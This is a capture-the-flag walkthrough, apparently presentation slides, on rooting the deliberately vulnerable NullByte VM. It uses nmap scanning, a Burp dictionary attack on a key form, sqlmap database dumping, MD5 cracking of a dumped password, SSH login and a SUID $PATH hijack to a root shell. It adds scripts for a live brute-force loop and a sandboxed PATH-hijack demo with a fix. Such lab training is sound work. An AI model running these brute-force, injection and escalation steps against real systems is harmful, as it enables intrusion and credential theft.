
Exploiting null byte vm

This presentation walks through exploiting NullByte, a deliberately vulnerable VM available on VulnHub. It compromises the VM with tools shipped with Kali Linux and then escalates privileges to root. The goal of the challenge is to find the flag, proof.txt.


2. ABOUT ME
  • Devansh Dubey
  • Volunteer at NULL Bhopal
  • Undergraduate student at UIT RGPV
  • Cyber security enthusiast
  • Twitter handle: @devanshdubey97
3. About NullByte VM
  • Name: NullByte: 1
  • Codename: NB0x01
  • Release date: 1 Aug 2015
  • Author: ly0n
  • Series: NullByte
  • Web page:
  • Download:
  • Objective: Get to /root/proof.txt and follow the instructions.
  • Level: Basic to intermediate.
  • Description: Boot2root; the box gets its IP from DHCP and works fine with VirtualBox and VMware.
  • Operating System: Linux
4. Our Agenda
  • Network scanning (netdiscover, Nmap)
  • Extracting hidden text from the image served by the target (ExifTool)
  • Dictionary attack with rockyou.txt (Burp Suite) to obtain the key
  • Obtaining database contents via sqlmap
  • Logging in over SSH on port 777
  • Finding SUID binaries
  • Privilege escalation by manipulating $PATH
  • Getting root and capturing the flag (proof.txt)
5. LET'S BEGIN
1. netdiscover: netdiscover is an ARP scanner that finds live hosts in a network range. Because it works at the ARP layer rather than with ICMP, it also sees hosts that do not answer pings, which makes it a good first step for locating the target on the local subnet. It is a command-line tool shipped with Kali Linux; -r takes the range to scan (the range used is not shown on the slide):
  • netdiscover -r
6. NETDISCOVER RESULT
Our target is [IP address not shown on the slide]. Now that we know the target, we scan it with Nmap.
7. 2. Nmap scan
  • Our target is [IP address not shown on the slide]; we scan it with Nmap.
  • nmap -A [target IP]
  • -A: aggressive scan; enables OS detection, version detection, default script scanning and traceroute.
  • The scan shows ports 80, 111, 777 and 44607 open, and the service on 777 is SSH, i.e. SSH has been moved from its default port 22 to 777. Next we open the target IP in the browser.
9. 3. ExifTool
The page shows an image and a quote, and there is nothing useful in the visible page or its source. Data may therefore be hidden in the image itself, most likely in its metadata. To read it we use ExifTool, an open-source metadata tool available on GitHub. Available on:
10. In the image's metadata you will find a Comment field containing kzMb5nVYJw. This looks like a directory name, so open it in the browser. The page presents a single text field that asks for a KEY.
12. 4. Dictionary attack
  • The page asks for a key. Since it is a plain text field, we run a dictionary attack against it with Burp Suite (Intruder) and rockyou.txt. (rockyou.txt is a wordlist shipped with Kali in /usr/share/wordlists/; it is delivered as rockyou.txt.gz and has to be extracted first.) A wrong key and the right key produce different responses, so sorting the Intruder results by response length singles out the hit: the key is elite.
13. 5. Using sqlmap
  • After entering the key elite, a new page opens that asks for a username, which we do not know yet. The form is injectable, so we pull the username out of the database with sqlmap.
  • sqlmap -u [target URL] --dbs --batch
  • --batch: never ask for user input; use the default answers.
  • --dbs: enumerate the DBMS databases.
14. It lists the databases: information_schema, mysql, performance_schema and seth. The first three are MySQL system schemas; seth is the application's own database.
15. 6. Next we dump the tables and columns of the seth database:
  • sqlmap -u [target URL] -D seth --dump-all --batch
  • -D seth: select the seth database.
  • --dump-all: dump the entries of every table.
  • Once the command finishes it prints the table name with its columns, including the username and password, as shown:
16. Now we know the username is ramses. The password is not stored in clear: the dumped value is base64-encoded, and what it decodes to is a hash.
17. 7. Password cracking
  • We have the username and the stored password, but the password is a hash, so it has to be cracked; there are many online services for this.
  • First remove the base64 layer:
  • $ echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=" | base64 -d
  • The result is a 32-character hex string, i.e. an MD5 digest. Paste that value into an online hash-lookup site (the site used is not shown on the slide) and click OK; it returns the original word: omega.
  • An online lookup only succeeds for hashes already in the service's database; if it fails, crack the digest offline with john or hashcat against rockyou.txt instead.
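The two wordlist attacks on the slides (the online guess against the key field on slide 12, and the offline attack on the dumped hash on slide 17) are the same loop with different oracles. The script below is an added example, not code from the slides or from the VM: it decodes the dumped value, classifies the digest by its length, and drives one dictionary loop against both oracles. The wordlist is a constructed five-word stand-in for rockyou.txt, the key form is a constructed stand-in that only accepts elite, and FORM_URL and FORM_FIELD in the live oracle are assumptions to be replaced with the action URL and input name from the page source. The slides report the cracked password as omega.

```sh
#!/bin/sh
# Added example (not from the slides): one wordlist driver, two oracles.
#  - online:  the key form from slide 12 (what Burp Intruder brute-forced)
#  - offline: the base64-wrapped MD5 from slide 17

# Constructed wordlist standing in for /usr/share/wordlists/rockyou.txt.
WORDLIST=$(mktemp)
printf '%s\n' 123456 password elite omega letmein > "$WORDLIST"

# Value sqlmap dumped for user ramses (slides 15/16).
DUMPED="YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE="

# Generic driver: feed each word to an oracle function; print the first hit.
# $1 = oracle function name, $2 = wordlist file. Exit 1 if nothing matches.
run_dictionary() {
    oracle=$1; list=$2
    while IFS= read -r word || [ -n "$word" ]; do
        if "$oracle" "$word"; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$list"
    return 1
}

# ---- online oracle ----------------------------------------------------------
# Constructed stand-in for the key form: it only accepts the key the slides found.
fake_key_form() { [ "$1" = "elite" ]; }

# What you would use against the VM. FORM_URL and FORM_FIELD are assumptions:
# take the real action URL and input name from the page source of the
# kzMb5nVYJw directory. Success is "response differs from the baseline",
# which is what sorting Intruder results by length shows you.
FORM_URL="http://TARGET/kzMb5nVYJw/index.php"   # assumption
FORM_FIELD="key"                                # assumption
# Before using live_key_form, record the response to a known-bad key:
#   BASELINE=$(curl -s --data-urlencode "$FORM_FIELD=wrong" "$FORM_URL")
BASELINE=""
live_key_form() {
    body=$(curl -s --data-urlencode "$FORM_FIELD=$1" "$FORM_URL")
    [ -n "$body" ] && [ "$body" != "$BASELINE" ]
}

# ---- offline oracle ---------------------------------------------------------
decode_layer() { printf '%s' "$1" | base64 -d; }
md5_hex()      { printf '%s' "$1" | md5sum | cut -d' ' -f1; }

# Guess the digest type from its length; 32 hex characters means MD5.
classify_hash() {
    case "$1" in *[!0-9a-fA-F]*) echo "not-hex"; return 1 ;; esac
    case ${#1} in
        32) echo md5 ;; 40) echo sha1 ;; 64) echo sha256 ;;
        *)  echo unknown; return 1 ;;
    esac
}

# Strip the base64 layer once; the hash underneath is what gets attacked.
TARGET_HASH=$(decode_layer "$DUMPED" | tr 'A-F' 'a-f')
md5_oracle() { [ "$(md5_hex "$1")" = "$TARGET_HASH" ]; }

cleanup() { rm -f "$WORDLIST"; }

# Stand-alone demonstration
printf 'decoded hash: %s (%s)\n' "$TARGET_HASH" "$(classify_hash "$TARGET_HASH")"
printf 'key:          %s\n' "$(run_dictionary fake_key_form "$WORDLIST")"
printf 'password:     %s\n' "$(run_dictionary md5_oracle "$WORDLIST")"
```

The offline oracle is the one that scales: hashing a candidate is cheap and leaves no trace on the target, whereas every online guess is a request in the web server log. That is also why the hash type matters; a salted or slow hash (bcrypt, scrypt) would make the same loop impractical with rockyou.txt.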
18. 8. Login through SSH
Now we log in over SSH on port 777:
  • ssh ramses@[target IP] -p 777
  • Enter omega as the password. Once logged in, the following command enumerates every file with the SUID bit set (errors for unreadable directories are discarded):
  • find / -perm -u=s -type f 2>/dev/null
  • Among the results, /var/www/backup/procwatch stands out: a SUID binary under the web root is unusual.
19. SUID ENABLED
20. 9. Privilege escalation
  • cd /var/www/backup/
  • ./procwatch
Procwatch is a process monitor: it watches the /proc filesystem for new processes and, when one is created, reports the time, the username, the PID and the binary that was run. Its output is suitable for logging and is aimed at system administrators testing a new but as yet untrusted UNIX system. The file is owned by root and has the SUID bit set, so whoever runs it gets root's effective UID for the duration of the run, and when it launches ps it does so by bare name, relying on the caller's $PATH to find it.
21. 10. Privilege escalation
  • echo "/bin/sh" > ps
  • chmod 777 ps  (chmod +x would do; the file only needs to be executable)
  • echo $PATH
  • export PATH=.:$PATH
  • echo $PATH
  • ./procwatch
  • A '.' at the front of $PATH makes the shell look up commands in the current directory first, so when procwatch runs ps it finds our script instead of /bin/ps and executes it with its effective UID of root; the /bin/sh it spawns is therefore a root shell. Running id confirms this (euid=0).
  • id
  • cd /root
  • ls
  • cat proof.txt
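The steps above hinge on command resolution: a privileged program that runs ps by bare name lets the caller decide which ps runs. The script below is an added example, not the slides' commands or the VM's binary, and it reproduces that mechanic in an unprivileged scratch directory, so nothing in it is SUID. The fake ps is constructed and merely announces itself (on the VM it was a script containing /bin/sh), and the hardened variant shows the fix a developer should have applied: an absolute path and a PATH the program sets itself.

```sh
#!/bin/sh
# Added example (not from the slides): the PATH-hijack mechanics of slide 21,
# reproduced without SUID. The point is how `ps` gets resolved, nothing else.

workdir=$(mktemp -d)

# Constructed stand-in for the attacker's fake `ps`. On the VM the payload was
# `echo "/bin/sh" > ps`, which hands you a shell with procwatch's euid (root);
# here it just announces that it ran.
printf '#!/bin/sh\necho HIJACKED\n' > "$workdir/ps"
chmod 755 "$workdir/ps"

# Which file does `ps` resolve to under PATH $1, with cwd = workdir?
# (Subshell so neither the cd nor the PATH change leaks out.)
resolve_ps() {
    ( cd "$workdir" && PATH=$1 && export PATH && command -v ps )
}

# Vulnerable pattern: the equivalent of a SUID binary doing system("ps").
# The caller controls PATH and cwd, so the caller chooses which ps runs.
vulnerable_procwatch() {
    ( cd "$workdir" && PATH=".:$PATH" && export PATH && ps )
}

# Hardened pattern: absolute path and an environment the program sets itself,
# so whatever the invoker put in PATH is irrelevant. (Not run below: it needs
# a real /bin/ps on the host.)
hardened_procwatch() {
    ( cd "$workdir" && PATH=".:$PATH" && export PATH \
        && env -i PATH=/usr/bin:/bin /bin/ps -o comm= -p $$ )
}

# The enumeration step from slide 18, as a function (output is host-specific).
list_suid_binaries() { find / -perm -4000 -type f 2>/dev/null; }

cleanup() { rm -rf "$workdir"; }

# Stand-alone demonstration
printf 'PATH=.:/usr/bin:/bin -> ps resolves to: %s\n' "$(resolve_ps ".:/usr/bin:/bin")"
printf 'PATH=/usr/bin:/bin   -> ps resolves to: %s\n' "$(resolve_ps "/usr/bin:/bin")"
printf 'vulnerable run printed: %s\n' "$(vulnerable_procwatch)"
```

Note what the fix is not: clearing PATH at the top of a shell wrapper is not enough if the SUID binary itself still calls system() with a bare name, and neither is checking the user's PATH, since the invoker owns the whole environment. The binary has to name its helper absolutely, or drop privileges before running anything.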
22. FLAG FOUND!
24. Any questions?